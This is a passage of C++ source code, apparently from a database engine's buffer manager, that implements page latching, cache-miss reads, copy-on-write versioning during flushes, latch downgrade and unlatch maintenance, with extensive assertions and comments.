// we found the IFMP / PGNO
if ( errHash == BFHash::ERR::errSuccess )
{
Assert( pgnopbf.pbf->ifmp == ifmp );
Assert( pgnopbf.pbf->pgno == pgno );
Assert( !pgnopbf.pbf->fAvailable );
Assert( !pgnopbf.pbf->fQuiesced );
// if we are not latching cached pages, bail
if ( bflfT & bflfNoCached )
{
g_bfhash.ReadUnlockKey( &lock );
return ErrERRCheck( errBFPageCached );
}
// this is a cache miss if the found BF is currently undergoing I/O
fCacheMiss = fCacheMiss || pgnopbf.pbf->err == errBFIPageFaultPending;
// latch the page
switch ( bfltReq )
{
case bfltShared:
if ( bflfT & bflfNoWait )
{
errSXWL = pgnopbf.pbf->sxwl.ErrTryAcquireSharedLatch();
}
else
{
errSXWL = pgnopbf.pbf->sxwl.ErrAcquireSharedLatch();
}
break;
case bfltExclusive:
if ( bflfT & bflfNoWait )
{
errSXWL = pgnopbf.pbf->sxwl.ErrTryAcquireExclusiveLatch();
}
else
{
errSXWL = pgnopbf.pbf->sxwl.ErrAcquireExclusiveLatch();
}
break;
case bfltWrite:
if ( bflfT & bflfNoWait )
{
errSXWL = pgnopbf.pbf->sxwl.ErrTryAcquireWriteLatch();
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
if ( errSXWL == CSXWLatch::ERR::errSuccess && pgnopbf.pbf->bfls == bflsHashed )
{
const size_t cProcs = (size_t)OSSyncGetProcessorCountMax();
size_t iProc = 0;
for ( iProc = 0; iProc < cProcs; iProc++ )
{
CSXWLatch* const psxwlProc = &Ppls( iProc )->rgBFHashedLatch[ pgnopbf.pbf->iHashedLatch ].sxwl;
errSXWL = psxwlProc->ErrTryAcquireWriteLatch();
if ( errSXWL != CSXWLatch::ERR::errSuccess )
{
break;
}
}
if ( errSXWL != CSXWLatch::ERR::errSuccess )
{
for ( size_t iProc2 = 0; iProc2 < iProc; iProc2++ )
{
CSXWLatch* const psxwlProc = &Ppls( iProc2 )->rgBFHashedLatch[ pgnopbf.pbf->iHashedLatch ].sxwl;
psxwlProc->ReleaseWriteLatch();
}
pgnopbf.pbf->sxwl.ReleaseWriteLatch();
}
}
#endif // MINIMAL_FUNCTIONALITY
}
else
{
errSXWL = pgnopbf.pbf->sxwl.ErrAcquireExclusiveLatch();
}
break;
default:
// should be impossible, but if something goes horribly wrong and
// we somehow inexplicably end up here, handle it as a latch conflict
//
Assert( fFalse );
errSXWL = CSXWLatch::ERR::errLatchConflict;
break;
}
// release our lock on the hash table
g_bfhash.ReadUnlockKey( &lock );
// if this was a latch conflict, bail
if ( errSXWL == CSXWLatch::ERR::errLatchConflict )
{
PERFOpt( cBFLatchConflict.Inc( perfinstGlobal ) );
return ErrERRCheck( errBFLatchConflict );
}
// wait for ownership of the latch if required
else if ( errSXWL == CSXWLatch::ERR::errWaitForSharedLatch )
{
if ( pgnopbf.pbf->err == errBFIPageFaultPending )
{
BFIAsyncReadWait( pgnopbf.pbf, bfltShared, bfpri, tc );
}
else
{
PERFOpt( cBFLatchStall.Inc( perfinstGlobal ) );
pgnopbf.pbf->sxwl.WaitForSharedLatch();
}
}
else if ( errSXWL == CSXWLatch::ERR::errWaitForExclusiveLatch )
{
if ( pgnopbf.pbf->err == errBFIPageFaultPending )
{
BFIAsyncReadWait( pgnopbf.pbf, bfltExclusive, bfpri, tc );
}
else
{
PERFOpt( cBFLatchStall.Inc( perfinstGlobal ) );
pgnopbf.pbf->sxwl.WaitForExclusiveLatch();
}
}
else
{
Assert( errSXWL == CSXWLatch::ERR::errSuccess );
}
if ( bfltReq == bfltWrite && !( bflfT & bflfNoWait ) )
{
if ( pgnopbf.pbf->sxwl.ErrUpgradeExclusiveLatchToWriteLatch() == CSXWLatch::ERR::errWaitForWriteLatch )
{
PERFOpt( cBFLatchStall.Inc( perfinstGlobal ) );
pgnopbf.pbf->sxwl.WaitForWriteLatch();
}
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
if ( pgnopbf.pbf->bfls == bflsHashed )
{
const size_t cProcs = (size_t)OSSyncGetProcessorCountMax();
for ( size_t iProc = 0; iProc < cProcs; iProc++ )
{
CSXWLatch* const psxwlProc = &Ppls( iProc )->rgBFHashedLatch[ pgnopbf.pbf->iHashedLatch ].sxwl;
if ( psxwlProc->ErrAcquireExclusiveLatch() == CSXWLatch::ERR::errWaitForExclusiveLatch )
{
PERFOpt( cBFLatchStall.Inc( perfinstGlobal ) );
psxwlProc->WaitForExclusiveLatch();
}
if ( psxwlProc->ErrUpgradeExclusiveLatchToWriteLatch() == CSXWLatch::ERR::errWaitForWriteLatch )
{
PERFOpt( cBFLatchStall.Inc( perfinstGlobal ) );
psxwlProc->WaitForWriteLatch();
}
}
}
#endif // MINIMAL_FUNCTIONALITY
}
Assert( FBFIOwnsLatchType( pgnopbf.pbf, bfltReq ) );
bfltHave = bfltReq;
OnDebug( relatchinfo[cRelatches].tickLatch = TickOSTimeCurrent() );
Assert( pgnopbf.pbf->ifmp == ifmp );
Assert( pgnopbf.pbf->pgno == pgno );
Assert( !pgnopbf.pbf->fAvailable );
Assert( !pgnopbf.pbf->fQuiesced );
if ( bfltReq == bfltWrite )
{
#ifdef DEBUG
Assert( pgnopbf.pbf->pgno <= g_rgfmp[ifmp].PgnoLast() || g_rgfmp[ifmp].FOlderDemandExtendDb() || ( bflfT & bflfLatchAbandoned ) );
#else
AssertTrack( pgnopbf.pbf->pgno <= g_rgfmp[ifmp].PgnoLast() || ( bflfT & bflfLatchAbandoned ), "WriteLatchPgnoLastTooLow" );
#endif
g_rgfmp[ifmp].UpdatePgnoHighestWriteLatched( pgno );
if ( !( bflf & bflfDBScan ) )
{
g_rgfmp[ifmp].UpdatePgnoWriteLatchedNonScanMax( pgno );
}
}
if ( bflf & bflfDBScan )
{
g_rgfmp[ifmp].UpdatePgnoLatchedScanMax( pgno );
}
// Ensure the pbf we pulled out the g_bfhash is the right one
if ( !FBFICurrentPage( pgnopbf.pbf, ifmp, pgno ) )
{
// Abort the latch on the wrong pbf, and retry ...
BFIReleaseSXWL( pgnopbf.pbf, bfltReq );
bfltHave = bfltNone;
pgnopbf.pbf = NULL;
pgnopbf.pgno = pgnoNull;
OnDebug( relatchinfo[cRelatches].ulLineContinue = __LINE__ );
cRelatches++;
continue;
}
// Under latchless IO we can have a page that is non-updatable / i.e. under going a flush, and
// this is ok for like a simple read / s-latch case ... However, this is not allowed:
// 1. if this thread is going for an x-latch (because WAR-latch or RDW->Write upgrades),
// 2. or if this thread is going for a w-latch (obviously),
// 3. or a page is not resident and thus we'd try to do a OS MM reclaim or BFISyncRead on it.
// In these 3 cases we have to do a COW / VersionCopyPage() to unburden the buffer
// undergoing the Write IO.
//
if ( ( bfltExclusive == bfltReq || bfltWrite == bfltReq ) &&
!FBFIUpdatablePage( pgnopbf.pbf ) )
{
PBF pbfNew = NULL;
AssertRTL( pgnopbf.pbf->err > -65536 && pgnopbf.pbf->err < 65536 );
if ( pgnopbf.pbf->err == wrnBFPageFlushPending &&
FBFICompleteFlushPage( pgnopbf.pbf, bfltReq ) )
{
// completed the state transition associated with the write IO ...
Enforce( pgnopbf.pbf->err < JET_errSuccess || pgnopbf.pbf->bfdf == bfdfClean );
Enforce( FBFIUpdatablePage( pgnopbf.pbf ) );
Assert( pgnopbf.pbf->err != errBFIPageRemapNotReVerified );
// With view-cache remapping, the FBFICompleteFlushPage() can leave
// the buffer in a freshly IO-error'd state (as if there was a read
// IO error) ... convienently read IO error processing is below, so
// just let it flow through ...
}
else
{
// we are going to claim this as a latch conflict for now ...
PERFOpt( cBFLatchConflict.Inc( perfinstGlobal ) );
const ERR errVersion = ErrBFIVersionCopyPage( pgnopbf.pbf, &pbfNew, fTrue, ( bfltWrite == bfltReq ) );
AssertRTL( errVersion > -65536 && errVersion < 65536 );
if ( errVersion >= JET_errSuccess )
{
CallS( errVersion );
// We've a newer (pbfNew) version of the page, and pgnopbf.pbf is now old
Assert( pbfNew );
if ( pgnopbf.pbf->bfdf > bfdfClean )
{
Assert( pgnopbf.pbf->pbfTimeDepChainPrev == pbfNew );
Assert( pbfNew->pbfTimeDepChainNext == pgnopbf.pbf );
}
Assert( !pgnopbf.pbf->fCurrentVersion );
Assert( pgnopbf.pbf->fOlderVersion );
Assert( !pbfNew->fOlderVersion );
Assert( pbfNew->fCurrentVersion );
// we should have the real buffer write latched at this point ...
Assert( FBFWriteLatched( ifmp, pgno ) );
// alright release this page / buffer ...
BFIReleaseSXWL( pgnopbf.pbf, bfltReq );
bfltHave = bfltNone;
pgnopbf.pbf = NULL;
pgnopbf.pgno = pgnoNull;
// we should still have the real buffer write latched at this point ...
Assert( FBFWriteLatched( ifmp, pgno ) );
// release the new version as well
pbfNew->sxwl.ReleaseWriteLatch();
// whoops, just jump back to the top and play it again ...
// it will fix itself up, how convienent.
OnDebug( relatchinfo[cRelatches].ulLineContinue = __LINE__ );
cRelatches++;
continue;
}
else
{
Assert( JET_errOutOfMemory == errVersion );
Assert( NULL == pbfNew );
// dump and bail ...
BFIReleaseSXWL( pgnopbf.pbf, bfltReq );
bfltHave = bfltNone;
pgnopbf.pbf = NULL;
pgnopbf.pgno = pgnoNull;
return errVersion;
}
}
}
// even if the cache is stable, we need to update the residency map.
BFIMaintCacheResidencyRequest();
// update DBA statistics and redirect not resident page faults to
// the database whenever possible
(void)ErrBFIMaintCacheStatsRequest( bfmcsrtNormal );
const OSFILEQOS qosIoPriorities = QosBFIMergeInstUserDispPri( PinstFromIfmp( pgnopbf.pbf->ifmp ), QosBFUserAndIoPri( bfpri ) );
if ( bfrsResident != pgnopbf.pbf->bfrs &&
pgnopbf.pbf->bfat == bfatFracCommit )
{
TraceContextScope tcBFLatch( iorpBFLatch );
BFIReclaimPageFromOS( pgnopbf.pbf, bfltReq, ( bflfT & bflfNew ), !( bflfT & bflfNoWait ), qosIoPriorities, cpe, *tcBFLatch );
}
// check to make sure the view doesn't need to be freshened to avoid
// deref'ing a paged out view.
if ( pgnopbf.pbf->bfat == bfatViewMapped && !FBFICacheViewFresh( pgnopbf.pbf ) )
{
TraceContextScope tcBFLatch( iorpBFLatch );
err = ErrBFICacheViewFreshen( pgnopbf.pbf, qosIoPriorities, *tcBFLatch );
if ( err < JET_errSuccess )
{
// release our latch and return the error
BFIReleaseSXWL( pgnopbf.pbf, bfltReq );
bfltHave = bfltNone;
// We could opportunistically take the write latch and update pbf->err, but
// I am going to leave the error path simple for now.
return err;
}
}
// check if this page is abandoned and retry, the expectation is that the purge code
// will eventually purge the page because buffers aren't supposed to remain in the cache
// in this state for an arbitrary amount of time.
if ( pgnopbf.pbf->fAbandoned && !( bflfT & bflfLatchAbandoned ) )
{
BFIReleaseSXWL( pgnopbf.pbf, bfltReq );
bfltHave = bfltNone;
pgnopbf.pbf = NULL;
pgnopbf.pgno = pgnoNull;
OnDebug( relatchinfo[cRelatches].ulLineContinue = __LINE__ );
cRelatches++;
UtilSleep( ( cRelatches * cRelatches / 2 ) * dtickFastRetry );
continue;
}
Assert( !( bflfT & ( bflfNew | bflfNewIfUncached ) ) || ( bfltReq == bfltWrite ) );
// we are latching a new page
if ( bflfT & bflfNew )
{
Assert( pgnopbf.pbf->ifmp == ifmp );
BFIInitialize( pgnopbf.pbf, tc );
if ( pfCachedNewPage != NULL )
{
*pfCachedNewPage = fTrue;
}
// the page is valid
err = JET_errSuccess;
}
// we are not latching a new page
else
{
// if this page was preread and we are touching it for the first
// time after the preread, do not touch it again even if asked
if ( pgnopbf.pbf->err == errBFIPageNotVerified )
{
bflfT = BFLatchFlags( bflfT | bflfNoTouch );
}
// check the IO error and validate the page
TraceContextScope tcBFLatch( iorpBFLatch );
err = ErrBFIValidatePage( pgnopbf.pbf, bfltReq, cpe, *tcBFLatch );
AssertRTL( err > -65536 && err < 65536 );
Assert( err != JET_errOutOfMemory &&
err != JET_errOutOfBuffers );
// we should not see any pages beyond EOF lingering in the cache because
// we both block preread beyond EOF and reject a synchronous read of such
// a page
AssertTrack( err != JET_errFileIOBeyondEOF, "BFILatchEofCachedValidate" );
// The page is in an error state and we should fail on an error.
// Note that JET_errFileIOBeyondEOF is rejected by the buffer manager
// and will cause the latch to fail, so bflfNoFaultFail is not honored
// in that case.
if ( ( ( err < JET_errSuccess ) && !( bflfT & bflfNoFaultFail ) ) ||
( err == JET_errFileIOBeyondEOF ) /* just in case */ )
{
// release our latch and return the error
BFIReleaseSXWL( pgnopbf.pbf, bfltReq );
bfltHave = bfltNone;
return err;
}
// if user requested "bad" pages, fix the error
Assert( err >= JET_errSuccess || ( bflfT & bflfNoFaultFail ) );
if ( err < JET_errSuccess )
{
if ( bflfT & bflfNoFaultFail )
{
// might be interesting to return a warning, but don't want to conflict
// with wrnBFPageFault for now, wait until we need it ...
err = JET_errSuccess;
}
}
}
// in view cache mode a page can be pre-fetched, and then paged back out by
// the OS MM ... if it's a x- or w- latch we will be soon updating it, so we
// want it paged back in and to materialize any IO error in an explicit path,
// rather than AV randomly in the engine.
if ( FBFICacheViewCacheDerefIo( pgnopbf.pbf ) &&
( bfltReq == bfltExclusive || bfltReq == bfltWrite ) &&
pgnopbf.pbf->bfdf == bfdfClean )
{
err = ErrBFIFaultInBufferIO( pgnopbf.pbf );
AssertTrack( err != JET_errFileIOBeyondEOF, "BFILatchEofCachedMM" );
// the page is in an error state and we should fail on an error
if ( ( ( err < JET_errSuccess ) && !( bflfT & bflfNoFaultFail ) ) ||
( err == JET_errFileIOBeyondEOF ) /* just in case */ )
{
// release our latch and return the error
BFIReleaseSXWL( pgnopbf.pbf, bfltReq );
bfltHave = bfltNone;
return err;
}
// if user requested "bad" pages, fix the error
Assert( err >= JET_errSuccess || ( bflfT & bflfNoFaultFail ) );
if ( err < JET_errSuccess )
{
if ( bflfT & bflfNoFaultFail )
{
// might be interesting to return a warning, but don't want to conflict
// with wrnBFPageFault for now, wait until we need it ...
err = JET_errSuccess;
}
}
}
// the user requested that we touch this page
// When we are using the file-cache, clean pages can be evicted and re-read
// at a very low cost, so prioritize keeping dirty pages in cache to reduce
// write I/O - read I/O is from the file-cache and so very low cost
const BOOL fTouchPage = ( !( bflfT & bflfNoTouch ) && !BoolParam( JET_paramEnableFileCache ) );
#ifndef MINIMAL_FUNCTIONALITY
if ( fTouchPage &&
g_fBFMaintHashedLatches &&
// Since we overload tickEligibleForNomination with tickViewLastRefreshed for
// view cache we must prevent view cache pages from being considered for fast
// latches. A reasonable trade-off.
pgnopbf.pbf->bfat == bfatFracCommit &&
g_bflruk.FSuperHotResource( pgnopbf.pbf ) )
{
BFILatchNominate( pgnopbf.pbf );
}
#endif // !MINIMAL_FUNCTIONALITY
BFITouchResource( pgnopbf.pbf, bfltReq, bflfT, fTouchPage, PctBFCachePri( bfpri ), tc );
// return the page
break;
}
// we did not find the IFMP / PGNO or we are not latching uncached pages
// and the found BF is currently undergoing I/O
else
{
Assert( bfltHave == bfltNone );
// release our lock on the hash table
g_bfhash.ReadUnlockKey( &lock );
// if we are not latching uncached pages, bail
if ( bflfT & bflfNoUncached )
{
return ErrERRCheck( errBFPageNotCached );
}
// this is now officially a cache miss
fCacheMiss = fTrue;
const BOOL fNewPage = ( bflfT & bflfNew ) || ( bflfT & bflfNewIfUncached );
// try to add this page to the cache
pgnopbf.pbf = NULL;
err = ErrBFICachePage( &pgnopbf.pbf,
ifmp,
pgno,
fNewPage, // fNewPage
fTrue, // fWait
fNewPage, // fMRU
PctBFCachePri( bfpri ), // pctCachePriority
tc, // tc
bfltReq, // bfltTraceOnly
bflfT ); // bflfTraceOnly
AssertRTL( err > -65536 && err < 65536 );
AssertTrack( ( err != JET_errFileIOBeyondEOF ) || !fNewPage, "BFILatchEofUncached" );
// the page was added to the cache
if ( err == JET_errSuccess )
{
bfltHave = bfltWrite;
TraceContextScope tcBFLatch( iorpBFLatch );
Assert( pgnopbf.pbf->sxwl.FOwnWriteLatch() );
Assert( pgnopbf.pbf->icbPage == pgnopbf.pbf->icbBuffer );
// we are latching a new page
if ( fNewPage )
{
// if the page was previously abandoned, it is no longer such ...
pgnopbf.pbf->fAbandoned = fFalse;
if ( pfCachedNewPage != NULL )
{
*pfCachedNewPage = fTrue;
}
}
// we are not latching a new page
if ( !fNewPage )
{
// read the page image from disk
pgnopbf.pbf->fSyncRead = fTrue; // note: not doing this in BFISyncRead() may cause bug some day, but don't want to mark pages re-read due to OS paged out
BFISyncRead( pgnopbf.pbf, QosBFIMergeInstUserDispPri( PinstFromIfmp( ifmp ), QosBFUserAndIoPri( bfpri ) ), *tcBFLatch );
OSTraceFMP(
ifmp,
JET_tracetagBufferManager,
OSFormat( "Sync-read page=[0x%x:0x%x]", (ULONG)ifmp, pgno ) );
// check the IO error and validate the page
err = ErrBFIValidatePage( pgnopbf.pbf, bfltWrite, cpe, *tcBFLatch );
AssertRTL( err > -65536 && err < 65536 );
AssertTrack( err != JET_errFileIOBeyondEOF, "BFILatchEofUncachedValidate" );
Expected( err != JET_errOutOfMemory &&
err != JET_errOutOfBuffers );
// the page is in an error state and we should fail on an error
if ( ( ( err < JET_errSuccess ) && !( bflfT & bflfNoFaultFail ) ) ||
( err == JET_errFileIOBeyondEOF ) /* just in case */ )
{
// release our latch and return the error
pgnopbf.pbf->sxwl.ReleaseWriteLatch();
bfltHave = bfltNone;
return err;
}
// if user requested "bad" pages, fix the error
Assert( err >= JET_errSuccess || ( bflfT & bflfNoFaultFail ) );
if ( err < JET_errSuccess )
{
if ( bflfT & bflfNoFaultFail )
{
// might be interesting to return a warning, but don't want to conflict
// with wrnBFPageFault for now, wait until we need it ...
err = JET_errSuccess;
}
}
}
// trace the page identity
if ( fNewPage )
{
// Unfortunately, we don't have the objid and page flags here and so the former
// trace (etguidCacheBlockNewPage) that was here has been moved / deferred to
// post page init in CPAGE::FinalizePreInitPage(). Also note this also changes the
// trace conditions subltly as it now traces a new page request even if the page
// was already in the cache (which is desirable for tracing page [not cache]
// lifecycles). If you're worried about ordering and the basic BF traces,
// remember there is a trace for ErrBFICachePage above to call BFITraceCachePage
// with etguidCacheBlockCachePage with the bflf (i.e with bflfNew) so this
// trace here was superflous and with bad page details.
}
else
{
if ( FBFIDatabasePage( pgnopbf.pbf ) )
{
// trace the operation
GetCurrUserTraceContext getutc;
CPAGE::PGHDR * ppghdr = (CPAGE::PGHDR *)pgnopbf.pbf->pv;
ETCacheReadPage(
ifmp,
pgno,
bflf,
ppghdr->objidFDP,
ppghdr->fFlags,
getutc->context.dwUserID,
getutc->context.nOperationID,
getutc->context.nOperationType,
getutc->context.nClientType,
getutc->context.fFlags,
getutc->dwCorrelationID,
tcBFLatch->iorReason.Iorp(),
tcBFLatch->iorReason.Iors(),
tcBFLatch->iorReason.Iort(),
tcBFLatch->iorReason.Ioru(),
tcBFLatch->iorReason.Iorf(),
tcBFLatch->nParentObjectClass,
ppghdr->dbtimeDirtied,
ppghdr->itagMicFree,
ppghdr->cbFree );
}
}
// make this BF eligible for nomination
Assert( pgnopbf.pbf->bfls != bflsHashed );
// Technically, these are setting the same variable here, but in case one feature is
// removed, the other will stay.
pgnopbf.pbf->tickViewLastRefreshed = TickBFIHashedLatchTime( TickOSTimeCurrent() );
pgnopbf.pbf->tickEligibleForNomination = pgnopbf.pbf->tickViewLastRefreshed;
// return the page
Assert( bfltHave == bfltWrite );
break;
}
// the page was already in the cache
else if ( err == errBFPageCached )
{
// try to latch the page again
OnDebug( relatchinfo[cRelatches].ulLineContinue = __LINE__ );
cRelatches++;
continue;
}
// the page could not be added to the cache
else
{
Assert( err == JET_errOutOfMemory ||
err == JET_errOutOfBuffers ||
err == JET_errFileIOBeyondEOF );
// fail out
AssertRTL( err > -65536 && err < 65536 );
return err;
}
}
} // forever loop
// downgrade our write latch to the requested latch.
if ( ( bfltHave != bfltReq ) && ( bfltHave != bfltNone ) )
{
EnforceSz( bfltHave == bfltWrite, OSFormat( "BadLatchDowngrade:%d", (int)bfltHave ) );
Expected( fCacheMiss ); // Currently only needed for cache miss where we w-latch to perform read IO.
switch ( bfltReq )
{
case bfltShared:
pgnopbf.pbf->sxwl.DowngradeWriteLatchToSharedLatch();
bfltHave = bfltShared;
break;
case bfltExclusive:
pgnopbf.pbf->sxwl.DowngradeWriteLatchToExclusiveLatch();
bfltHave = bfltExclusive;
break;
case bfltWrite:
break;
default:
Assert( fFalse );
break;
}
}
// if the tce is not set then do so now
if ( (TCE)tc.nParentObjectClass != tceNone && pgnopbf.pbf->tce == tceNone )
{
PERFOpt( cBFCache.Dec( PinstFromIfmp( ifmp ), pgnopbf.pbf->tce, ifmp ) );
PERFOpt( cBFCache.Inc( PinstFromIfmp( ifmp ), (TCE)tc.nParentObjectClass, ifmp ) );
pgnopbf.pbf->tce = (TCE)tc.nParentObjectClass;
}
// return the page
AssertRTL( err > -65536 && err < 65536 );
if ( fCacheMiss )
{
PERFOpt( cBFCacheMiss.Inc( PinstFromIfmp( pgnopbf.pbf->ifmp ), pgnopbf.pbf->tce ) );
}
PERFOpt( cBFSlowLatch.Inc( perfinstGlobal ) );
if ( bflf & bflfHint )
{
PERFOpt( cBFBadLatchHint.Inc( perfinstGlobal ) );
err = err < JET_errSuccess ? err : ErrERRCheck( wrnBFBadLatchHint );
}
PERFOpt( cBFCacheReq.Inc( PinstFromIfmp( pgnopbf.pbf->ifmp ), pgnopbf.pbf->tce ) );
pbfl->pv = pgnopbf.pbf->pv;
pbfl->dwContext = DWORD_PTR( pgnopbf.pbf );
// this should now always be true, even with bflfNoFaultFail
Assert( ( err < JET_errSuccess &&
pgnopbf.pbf->sxwl.FNotOwner() &&
bfltHave == bfltNone ) ||
( err >= JET_errSuccess &&
FBFIOwnsLatchType( pgnopbf.pbf, bfltReq ) &&
bfltHave == bfltReq ) );
#ifdef DEBUG
if ( bflf & bflfNoFaultFail )
{
// just a handful of errors we know we should have handled ...
if ( pgnopbf.pbf->err == JET_errDiskIO ||
pgnopbf.pbf->err == JET_errReadVerifyFailure )
{
// we return success, even though we have error state under bflfNoFaultFail
Assert( err != pgnopbf.pbf->err );
}
}
#endif
AssertRTL( err > -65536 && err < 65536 );
return ( err != JET_errSuccess ?
err :
( fCacheMiss ?
ErrERRCheck( wrnBFPageFault ) :
JET_errSuccess ) );
}
//#define NUKE_OLD_VERSIONS_EXPENSIVE_DEBUG
#ifdef NUKE_OLD_VERSIONS_EXPENSIVE_DEBUG
DWORD g_cbfFlushPurgeNukeAttempts = 0;
DWORD g_cbfFlushPurgeNukeSuccesses = 0;
BOOL FBFIFlushPurgeNukeRelease( PBF pbf, IOREASONPRIMARY iorp )
{
BOOL fRet = fFalse;
Assert( pbf->sxwl.FOwnWriteLatch() );
g_cbfFlushPurgeNukeAttempts++;
// Lets assert we are at least meeting with a little success ...
Assert( ( g_cbfFlushPurgeNukeAttempts / 16 ) <= g_cbfFlushPurgeNukeSuccesses );
//
// If the page is not clean yet, we will need to flush first ...
//
if ( pbf->bfdf != bfdfClean )
{
// First need to ensure page can be flushed, flush any dependencies ...
if ( ErrBFITryPrepareFlushPage( pbf, bfltWrite, IOR( iorp ), qosIODispatchUrgentBackgroundMax, fTrue ) < JET_errSuccess )
{
// We have failed.
return fFalse;
}
// Next actually write/flush the page itself.
//
TraceContext tcContext = BFIGetTraceContext( pbf );
tcContext.iorReason.SetIorp( iorp );
tcContext.iorReason.AddFlag( iorfForeground );
if ( ErrBFISyncWrite( pbf, bfltWrite, qosIODispatchImmediate, &tcContext ) < JET_errSuccess )
{
// We have failed.
return fFalse;
}
}
//
// Now Purge / Evict the page ... note this also releases the latch.
//
// Lock LRU-K for eviction
//
BFLRUK::CLock lockLRUK;
g_bflruk.LockResourceForEvict( pbf, &lockLRUK );
// Release w-latch, so ErrBFIEvict can operate correctly
pbf->sxwl.ReleaseWriteLatch();
// Evict specific page/pbf.
//
ERR errEvict = ErrBFIEvictPage( pbf, &lockLRUK, BFEvictFlags( bfefReasonTest | bfefNukePageImage ) );
// Latch is gone whether successful or not ...
fRet = fTrue;
g_cbfFlushPurgeNukeSuccesses += ( JET_errSuccess == errEvict );
g_bflruk.UnlockResourceForEvict( &lockLRUK );
return fRet;
}
#endif
void BFIUnlatchMaintPage( __inout PBF const pbf, __in const BFLatchType bfltHave )
{
PBF pbfNew = NULL;
Assert( bfltMax != bfltHave );
Assert( pbf->sxwl.FOwner() );
Assert( FBFIOwnsLatchType( pbf, bfltHave ) );
// There should be something interesting about this bf to maintain ...
Assert( FBFICurrentPage( pbf, pbf->ifmp, pbf->pgno ) );
// save anything we might need post unlatch
const BFDirtyFlags bfdf = BFDirtyFlags( pbf->bfdf );
// If we're have a write latch, we can do more maintanence
if ( bfltWrite == bfltHave )
{
Assert( pbf->bfdf >= bfdfUntidy );
// if this BF is impeding the checkpoint and there are other threads
// waiting for the exclusive latch and the page doesn't already have an
// older version then try to version the page while we still have the
// exclusive latch to facilitate checkpoint advancement
// see if we want to opportunistically version this page to try to flush
BFIOpportunisticallyVersionCopyPage( pbf, &pbfNew, fTrue /* has write latch */ );
if ( pbfNew )
{
Assert( FBFIOwnsLatchType( pbf, bfltHave ) );
Assert( pbfNew->sxwl.FOwnWriteLatch() );
pbfNew->sxwl.ReleaseWriteLatch();
#ifdef NUKE_OLD_VERSIONS_EXPENSIVE_DEBUG
if ( bfltExclusive == bfltHave )
{
// Note this can cause a deadlock, but VERY, VERY rarely ... need try
// upgrade ... or remove before checkin, restrict to if we have the w-latch ...
CSXWLatch::ERR errEUWL = pbf->sxwl.ErrUpgradeExclusiveLatchToWriteLatch();
if ( errEUWL != CSXWLatch::errSuccess )
{
Assert( errEUWL == CSXWLatch::errWaitForWriteLatch );
pbf->sxwl.WaitForWriteLatch();
}
bfltHave = bfltWrite;
}
if ( FBFIFlushPurgeNukeRelease( pbf, iorpBFCheckpointAdv ) )
{
bfltHave = bfltMax; // released!
}
#endif
}
}
// Actually release the latch
if ( bfltMax != bfltHave )
{
BFIReleaseSXWL( pbf, bfltHave );
}
// Now do post processing ...
if ( bfdf == bfdfFilthy )
{
// try to flush this filthy IFMP / PGNO
BFIOpportunisticallyFlushPage( pbf, iorpBFFilthyFlush );
}
else if ( pbfNew )
{
// we felt a need to version the page for checkpoint, try to flush the page ...
BFIOpportunisticallyFlushPage( pbf, iorpBFCheckpointAdv );
}
// validate out situation
Assert( pbf->sxwl.FNotOwner() );
if ( pbfNew )
{
Assert( pbfNew->sxwl.FNotOwner() );
}
}
PBF PbfBFIGetFlushOrderLeaf( const PBF pbf, const BOOL fFlagCheckpointImpeders )
{
PBF pbfT = NULL;
// find a leaf of our branch in the time dependency chain
Assert( g_critBFDepend.FOwner() );
pbfT = pbf;
while ( pbfT->pbfTimeDepChainNext != pbfNil )
{
pbfT = pbfT->pbfTimeDepChainNext;
Assert( pbfT->ifmp == pbf->ifmp ); // no cross-database dependencies allowed
if ( fFlagCheckpointImpeders )
{
pbfT->bfbitfield.SetFImpedingCheckpoint( fTrue );
}
}
Assert( pbfT->pbfTimeDepChainNext == pbfNil );
// return the leaf of our branch ... note this could be the original pbf.
return pbfT;
}
void BFIAssertReadyForWrite( __in const PBF pbf )
{
// ensure the lockless-IO write status state is correct
Assert( FBFIUpdatablePage( pbf ) );
Assert( pbf->bfbitfield.FRangeLocked() );
Assert( pbf->err != errBFIPageFaultPending );
Assert( pbf->err != wrnBFPageFlushPending );
Assert( pbf->pWriteSignalComplete == NULL );
Assert( PvBFIAcquireIOContext( pbf ) == NULL );
// should be no error, or we couldn't write this
Assert( JET_errSuccess == pbf->err );
// ensure there are no dependencies on this BF
Assert( !pbf->bfbitfield.FDependentPurged() );
Assert( pbf->pbfTimeDepChainNext == pbfNil );
Assert( pbf->prceUndoInfoNext == prceNil );
Assert( ( CmpLgpos( &pbf->lgposModify, &lgposMin ) == 0 ) ||
( CmpLgpos( pbf->lgposModify, g_rgfmp[ pbf->ifmp ].LgposWaypoint() ) < 0 ) );
#ifdef DEBUG
const INST * const pinst = PinstFromIfmp( pbf->ifmp );
LOG * const plog = pinst->m_plog;
// In recovery, we set the lgposFlushTip to like 0x3:FFFF:FFFF when the lgposWrite
// is at 0x3:0034:0032 (= whatever we just last replayed) ... consider nailing down
// this contract enough to improve the assert, but for now skip recoverying case.
// There are also cases when transitioning out of recovery-redo in which m_fRecovering
// and m_fRecoveringMode flip back and forth to avoid asserts in some log read APIs,
// causing confusion in LGWriteAndFlushTip(), which returns different variables depending
// on those flags. Therefore, only consume lgposWriteTip when we are fully initialized.
// Obviously, the checks don't make sense if logging is disabled either.
if ( !plog->FLogDisabled() )
{
const BOOL fJetInitialized = pinst->m_fJetInitialized;
const BOOL fRecovering = plog->FRecovering();
LGPOS lgposFlushTip, lgposWriteTip;
plog->LGWriteAndFlushTip( &lgposWriteTip, &lgposFlushTip );
const INT icmpFlush = CmpLgpos( pbf->lgposModify.LgposAtomicRead(), lgposFlushTip );
const INT icmpWrite = CmpLgpos( pbf->lgposModify.LgposAtomicRead(), lgposWriteTip );
Assert( ( icmpWrite < 0 ) || !fJetInitialized );
Assert( icmpFlush < 0 );
Assert( ( CmpLgpos( &lgposFlushTip, &lgposWriteTip ) <= 0 ) || fRecovering || !fJetInitialized );
}
const BOOL fSnapshotFlushed = !g_rgfmp[ pbf->ifmp ].FRBSOn() || CmpRbspos( g_rgfmp[ pbf->ifmp ].PRBS()->RbsposFlushPoint(), pbf->rbsposSnapshot ) >= 0;
Assert( fSnapshotFlushed );
#endif
}
// same as prepare flush pages, but repatitvely tries synchronously ... if can't succeed within reasonable
// effort, gives up and fails out ...
ERR ErrBFITryPrepareFlushPage(
_Inout_ const PBF pbf,
_In_ const BFLatchType bfltHave,
_In_ IOREASON ior,
_In_ const OSFILEQOS qos,
